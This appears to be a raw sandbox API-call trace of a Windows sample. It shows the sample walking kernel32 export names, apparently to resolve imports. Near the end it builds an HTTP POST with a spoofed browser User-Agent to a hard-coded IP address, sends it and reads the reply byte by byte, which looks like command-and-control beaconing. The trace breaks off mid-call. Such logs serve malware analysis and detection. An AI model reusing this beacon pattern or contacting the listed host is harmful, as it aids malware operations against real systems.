lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0178.656] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0178.656] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0178.656] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0178.656] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0178.656] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0178.656] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0178.656] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0178.656] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0178.656] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0178.656] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0178.656] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0178.656] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0178.657] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0178.657] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0178.657] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0178.657] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0178.657] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0178.657] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0178.657] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0178.657] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0178.657] lstrlenA (lpString="CREATETHREAD") returned 12 [0178.657] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0178.657] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0178.657] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0178.657] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0178.657] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0178.657] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0178.657] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0178.657] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0178.657] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0178.657] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0178.657] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0178.657] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0178.657] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0178.657] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0178.657] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0178.657] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0178.657] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0178.657] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0178.657] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0178.657] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0178.657] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0178.657] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0178.657] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0178.657] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0178.657] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0178.657] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0178.657] lstrcpyA (in: lpString1=0x31ce648, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0178.657] lstrlenA (lpString="CTRLROUTINE") returned 11 [0178.657] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0178.658] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0178.658] lstrcpyA (in: lpString1=0x31ce648, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0178.658] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0178.658] lstrcpyA (in: lpString1=0x31ce648, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0178.658] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0178.658] lstrcpyA (in: lpString1=0x31ce648, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0178.658] lstrlenA (lpString="DEBUGBREAK") returned 10 [0178.658] lstrcpyA (in: lpString1=0x31ce648, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0178.658] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0178.658] lstrcpyA (in: lpString1=0x31ce648, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0178.658] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0178.658] lstrcpyA (in: lpString1=0x31ce648, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0178.658] lstrlenA (lpString="DECODEPOINTER") returned 13 [0178.658] lstrcpyA (in: lpString1=0x31ce648, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0178.658] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0178.658] lstrcpyA (in: lpString1=0x31ce648, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0178.658] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0178.658] lstrcpyA (in: lpString1=0x31ce648, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0178.658] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0178.658] lstrcpyA (in: lpString1=0x31ce648, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0178.658] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0178.658] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0178.658] lstrlenA (lpString="DELETEATOM") returned 10 [0178.658] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0178.658] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0178.658] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0178.658] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0178.658] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0178.658] lstrlenA (lpString="DELETEFIBER") returned 11 [0178.658] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0178.658] lstrlenA (lpString="DELETEFILEA") returned 11 [0178.658] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0178.658] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0178.658] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0178.658] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0178.658] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0178.659] lstrlenA (lpString="DELETEFILEW") returned 11 [0178.659] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0178.659] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0178.659] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0178.659] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0178.659] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0178.659] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0178.659] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0178.659] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0178.659] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0178.659] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0178.659] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0178.659] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0178.659] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0178.659] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0178.659] lstrcpyA (in: lpString1=0x31ce648, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0178.659] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0178.659] lstrcpyA (in: lpString1=0x31ce648, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0178.659] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0178.659] lstrcpyA (in: lpString1=0x31ce648, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0178.659] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0178.659] lstrcpyA (in: lpString1=0x31ce648, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0178.659] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0178.659] lstrcpyA (in: lpString1=0x31ce648, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0178.659] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0178.659] lstrcpyA (in: lpString1=0x31ce648, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0178.659] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0178.659] lstrcpyA (in: lpString1=0x31ce648, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0178.659] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0178.659] lstrcpyA (in: lpString1=0x31ce648, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0178.659] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0178.659] lstrcpyA (in: lpString1=0x31ce648, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0178.659] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0178.659] lstrcpyA (in: lpString1=0x31ce648, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0178.659] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0178.659] lstrcpyA (in: lpString1=0x31ce648, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0178.660] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0178.660] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0178.660] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0178.660] lstrcpyA (in: lpString1=0x31ce648, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0178.660] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0178.660] lstrcpyA (in: lpString1=0x31ce648, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0178.660] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0178.660] lstrcpyA (in: lpString1=0x31ce648, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0178.660] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0178.660] lstrcpyA (in: lpString1=0x31ce648, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0178.660] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0178.660] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0178.660] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0178.660] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0178.660] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0178.660] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0178.660] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0178.660] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0178.660] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0178.660] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0178.660] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0178.660] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0178.660] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0178.660] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0178.660] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0178.660] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0178.660] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0178.660] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0178.660] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0178.660] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0178.660] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0178.660] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0178.661] wsprintfA (in: param_1=0x3a0000, param_2="POST /%s HTTP/1.1\r\nUser-Agent: %s\r\nHost: %s\r\nContent-Type: %s\r\nContent-Length: %d\r\nConnection: Keep-Alive\r\n\r\n" | out: param_1="POST /dpyrqpykiq.do?qn=7&e=6u5415atv&s=se3ry&lij=8ib HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko\r\nHost: 91.218.114.4\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 247\r\nConnection: Keep-Alive\r\n\r\n") returned 265 [0178.661] send (s=0x228, buf=0x3a0000*, len=512, flags=0) returned 512 [0178.662] shutdown (s=0x228, how=1) returned 0 [0178.662] recv (in: s=0x228, buf=0x31cf30c, len=1, flags=0 | out: buf=0x31cf30c*) returned 1 [0178.718] recv (in: s=0x228, buf=0x31cf30d, len=1, flags=0 | out: buf=0x31cf30d*) returned 1 [0178.718] recv (in: s=0x228, buf=0x31cf30e, len=1, flags=0 | out: buf=0x31cf30e*) returned 1 [0178.718] recv (in: s=0x228, buf=0x31cf30f, len=1, flags=0 | out: buf=0x31cf30f*) returned 1 [0178.718] recv (in: s=0x228, buf=0x31cf310, len=1, flags=0 | out: buf=0x31cf310*) returned 1 [0178.718] recv (in: s=0x228, buf=0x31cf311, len=1, flags=0 | out: buf=0x31cf311*) returned 1 [0178.718] recv (in: s=0x228, buf=0x31cf312, len=1, flags=0 | out: buf=0x31cf312*) returned 1 [0178.718] recv (in: s=0x228, buf=0x31cf313, len=1, flags=0 | out: buf=0x31cf313*) returned 1 [0178.718] recv (in: s=0x228, buf=0x31cf314, len=1, flags=0 | out: buf=0x31cf314*) returned 1 [0178.718] recv (in: s=0x228, buf=0x31cf315, len=1, flags=0 | out: buf=0x31cf315*) returned 1 [0178.718] recv (in: s=0x228, buf=0x31cf316, len=1, flags=0 | out: buf=0x31cf316*) returned 1 [0178.718] recv (in: s=0x228, buf=0x31cf317, len=1, flags=0 | out: buf=0x31cf317*) returned 1 [0178.718] recv (in: s=0x228, buf=0x31cf318, len=1, flags=0 | out: buf=0x31cf318*) returned 1 [0178.719] recv (in: s=0x228, buf=0x31cf319, len=1, flags=0 | out: buf=0x31cf319*) returned 1 [0178.719] recv (in: s=0x228, buf=0x31cf31a, len=1, flags=0 | out: buf=0x31cf31a*) returned 1 [0178.719] recv (in: s=0x228, buf=0x31cf31b, len=1, flags=0 | out: buf=0x31cf31b*) returned 1 [0178.719] recv (in: s=0x228, buf=0x31cf31c, len=1, flags=0 | out: buf=0x31cf31c*) returned 1 [0178.719] recv (in: s=0x228, buf=0x31cf31d, len=1, flags=0 | out: buf=0x31cf31d*) returned 1 [0178.719] recv (in: s=0x228, buf=0x31cf31e, len=1, flags=0 | out: buf=0x31cf31e*) returned 1 [0178.719] recv (in: s=0x228, buf=0x31cf31f, len=1, flags=0 | out: buf=0x31cf31f*) returned 1 [0178.719] recv (in: s=0x228, buf=0x31cf320, len=1, flags=0 | out: buf=0x31cf320*) returned 1 [0178.719] recv (in: s=0x228, buf=0x31cf321, len=1, flags=0 | out: buf=0x31cf321*) returned 1 [0178.719] recv (in: s=0x228, buf=0x31cf322, len=1, flags=0 | out: buf=0x31cf322*) returned 1 [0178.719] recv (in: s=0x228, buf=0x31cf323, len=1, flags=0 | out: buf=0x31cf323*) returned 1 [0178.719] recv (in: s=0x228, buf=0x31cf324, len=1, flags=0 | out: buf=0x31cf324*) returned 1 [0178.719] recv (in: s=0x228, buf=0x31cf325, len=1, flags=0 | out: buf=0x31cf325*) returned 1 [0178.719] recv (in: s=0x228, buf=0x31cf326, len=1, flags=0 | out: buf=0x31cf326*) returned 1 [0178.720] recv (in: s=0x228, buf=0x31cf327, len=1, flags=0 | out: buf=0x31cf327*) returned 1 [0178.720] recv (in: s=0x228, buf=0x31cf328, len=1, flags=0 | out: buf=0x31cf328*) returned 1 [0178.720] recv (in: s=0x228, buf=0x31cf329, len=1, flags=0 | out: buf=0x31cf329*) returned 1 [0178.720] recv (in: s=0x228, buf=0x31cf32a, len=1, flags=0 | out: buf=0x31cf32a*) returned 1 [0178.720] recv (in: s=0x228, buf=0x31cf32b, len=1, flags=0 | out: buf=0x31cf32b*) returned 1 [0178.720] recv (in: s=0x228, buf=0x31cf32c, len=1, flags=0 | out: buf=0x31cf32c*) returned 1 [0178.720] recv (in: s=0x228, buf=0x31cf32d, len=1, flags=0 | out: buf=0x31cf32d*) returned 1 [0178.720] recv (in: s=0x228, buf=0x31cf32e, len=1, flags=0 | out: buf=0x31cf32e*) returned 1 [0178.720] recv (in: s=0x228, buf=0x31cf32f, len=1, flags=0 | out: buf=0x31cf32f*) returned 1 [0178.720] recv (in: s=0x228, buf=0x31cf330, len=1, flags=0 | out: buf=0x31cf330*) returned 1 [0178.720] recv (in: s=0x228, buf=0x31cf331, len=1, flags=0 | out: buf=0x31cf331*) returned 1 [0178.720] recv (in: s=0x228, buf=0x31cf332, len=1, flags=0 | out: buf=0x31cf332*) returned 1 [0178.720] recv (in: s=0x228, buf=0x31cf333, len=1, flags=0 | out: buf=0x31cf333*) returned 1 [0178.720] recv (in: s=0x228, buf=0x31cf334, len=1, flags=0 | out: buf=0x31cf334*) returned 1 [0178.721] recv (in: s=0x228, buf=0x31cf335, len=1, flags=0 | out: buf=0x31cf335*) returned 1 [0178.721] recv (in: s=0x228, buf=0x31cf336, len=1, flags=0 | out: buf=0x31cf336*) returned 1 [0178.721] recv (in: s=0x228, buf=0x31cf337, len=1, flags=0 | out: buf=0x31cf337*) returned 1 [0178.721] recv (in: s=0x228, buf=0x31cf338, len=1, flags=0 | out: buf=0x31cf338*) returned 1 [0178.721] recv (in: s=0x228, buf=0x31cf339, len=1, flags=0 | out: buf=0x31cf339*) returned 1 [0178.721] recv (in: s=0x228, buf=0x31cf33a, len=1, flags=0 | out: buf=0x31cf33a*) returned 1 [0178.721] recv (in: s=0x228, buf=0x31cf33b, len=1, flags=0 | out: buf=0x31cf33b*) returned 1 [0178.721] recv (in: s=0x228, buf=0x31cf33c, len=1, flags=0 | out: buf=0x31cf33c*) returned 1 [0178.721] recv (in: s=0x228, buf=0x31cf33d, len=1, flags=0 | out: buf=0x31cf33d*) returned 1 [0178.721] recv (in: s=0x228, buf=0x31cf33e, len=1, flags=0 | out: buf=0x31cf33e*) returned 1 [0178.721] recv (in: s=0x228, buf=0x31cf33f, len=1, flags=0 | out: buf=0x31cf33f*) returned 1 [0178.722] recv (in: s=0x228, buf=0x31cf340, len=1, flags=0 | out: buf=0x31cf340*) returned 1 [0178.722] recv (in: s=0x228, buf=0x31cf341, len=1, flags=0 | out: buf=0x31cf341*) returned 1 [0178.722] recv (in: s=0x228, buf=0x31cf342, len=1, flags=0 | out: buf=0x31cf342*) returned 1 [0178.722] recv (in: s=0x228, buf=0x31cf343, len=1, flags=0 | out: buf=0x31cf343*) returned 1 [0178.722] recv (in: s=0x228, buf=0x31cf344, len=1, flags=0 | out: buf=0x31cf344*) returned 1 [0178.722] recv (in: s=0x228, buf=0x31cf345, len=1, flags=0 | out: buf=0x31cf345*) returned 1 [0178.722] recv (in: s=0x228, buf=0x31cf346, len=1, flags=0 | out: buf=0x31cf346*) returned 1 [0178.722] recv (in: s=0x228, buf=0x31cf347, len=1, flags=0 | out: buf=0x31cf347*) returned 1 [0178.722] recv (in: s=0x228, buf=0x31cf348, len=1, flags=0 | out: buf=0x31cf348*) returned 1 [0178.722] recv (in: s=0x228, buf=0x31cf349, len=1, flags=0 | out: buf=0x31cf349*) returned 1 [0178.722] recv (in: s=0x228, buf=0x31cf34a, len=1, flags=0 | out: buf=0x31cf34a*) returned 1 [0178.722] recv (in: s=0x228, buf=0x31cf34b, len=1, flags=0 | out: buf=0x31cf34b*) returned 1 [0178.722] recv (in: s=0x228, buf=0x31cf34c, len=1, flags=0 | out: buf=0x31cf34c*) returned 1 [0178.722] recv (in: s=0x228, buf=0x31cf34d, len=1, flags=0 | out: buf=0x31cf34d*) returned 1 [0178.723] recv (in: s=0x228, buf=0x31cf34e, len=1, flags=0 | out: buf=0x31cf34e*) returned 1 [0178.723] recv (in: s=0x228, buf=0x31cf34f, len=1, flags=0 | out: buf=0x31cf34f*) returned 1 [0178.723] recv (in: s=0x228, buf=0x31cf350, len=1, flags=0 | out: buf=0x31cf350*) returned 1 [0178.723] recv (in: s=0x228, buf=0x31cf351, len=1, flags=0 | out: buf=0x31cf351*) returned 1 [0178.723] recv (in: s=0x228, buf=0x31cf352, len=1, flags=0 | out: buf=0x31cf352*) returned 1 [0178.723] recv (in: s=0x228, buf=0x31cf353, len=1, flags=0 | out: buf=0x31cf353*) returned 1 [0178.723] recv (in: s=0x228, buf=0x31cf354, len=1, flags=0 | out: buf=0x31cf354*) returned 1 [0178.723] recv (in: s=0x228, buf=0x31cf355, len=1, flags=0 | out: buf=0x31cf355*) returned 1 [0178.723] recv (in: s=0x228, buf=0x31cf356, len=1, flags=0 | out: buf=0x31cf356*) returned 1 [0178.723] recv (in: s=0x228, buf=0x31cf357, len=1, flags=0 | out: buf=0x31cf357*) returned 1 [0178.723] recv (in: s=0x228, buf=0x31cf358, len=1, flags=0 | out: buf=0x31cf358*) returned 1 [0178.723] recv (in: s=0x228, buf=0x31cf359, len=1, flags=0 | out: buf=0x31cf359*) returned 1 [0178.723] recv (in: s=0x228, buf=0x31cf35a, len=1, flags=0 | out: buf=0x31cf35a*) returned 1 [0178.723] recv (in: s=0x228, buf=0x31cf35b, len=1, flags=0 | out: buf=0x31cf35b*) returned 1 [0178.724] recv (in: s=0x228, buf=0x31cf35c, len=1, flags=0 | out: buf=0x31cf35c*) returned 1 [0178.724] recv (in: s=0x228, buf=0x31cf35d, len=1, flags=0 | out: buf=0x31cf35d*) returned 1 [0178.724] recv (in: s=0x228, buf=0x31cf35e, len=1, flags=0 | out: buf=0x31cf35e*) returned 1 [0178.724] recv (in: s=0x228, buf=0x31cf35f, len=1, flags=0 | out: buf=0x31cf35f*) returned 1 [0178.724] recv (in: s=0x228, buf=0x31cf360, len=1, flags=0 | out: buf=0x31cf360*) returned 1 [0178.724] recv (in: s=0x228, buf=0x31cf361, len=1, flags=0 | out: buf=0x31cf361*) returned 1 [0178.724] recv (in: s=0x228, buf=0x31cf362, len=1, flags=0 | out: buf=0x31cf362*) returned 1 [0178.724] recv (in: s=0x228, buf=0x31cf363, len=1, flags=0 | out: buf=0x31cf363*) returned 1 [0178.724] recv (in: s=0x228, buf=0x31cf364, len=1, flags=0 | out: buf=0x31cf364*) returned 1 [0178.724] recv (in: s=0x228, buf=0x31cf365, len=1, flags=0 | out: buf=0x31cf365*) returned 1 [0178.724] recv (in: s=0x228, buf=0x31cf366, len=1, flags=0 | out: buf=0x31cf366*) returned 1 [0178.724] recv (in: s=0x228, buf=0x31cf367, len=1, flags=0 | out: buf=0x31cf367*) returned 1 [0178.724] recv (in: s=0x228, buf=0x31cf368, len=1, flags=0 | out: buf=0x31cf368*) returned 1 [0178.724] recv (in: s=0x228, buf=0x31cf369, len=1, flags=0 | out: buf=0x31cf369*) returned 1 [0178.725] recv (in: s=0x228, buf=0x31cf36a, len=1, flags=0 | out: buf=0x31cf36a*) returned 1 [0178.725] recv (in: s=0x228, buf=0x31cf36b, len=1, flags=0 | out: buf=0x31cf36b*) returned 1 [0178.725] recv (in: s=0x228, buf=0x31cf36c, len=1, flags=0 | out: buf=0x31cf36c*) returned 1 [0178.725] recv (in: s=0x228, buf=0x31cf36d, len=1, flags=0 | out: buf=0x31cf36d*) returned 1 [0178.725] recv (in: s=0x228, buf=0x31cf36e, len=1, flags=0 | out: buf=0x31cf36e*) returned 1 [0178.725] recv (in: 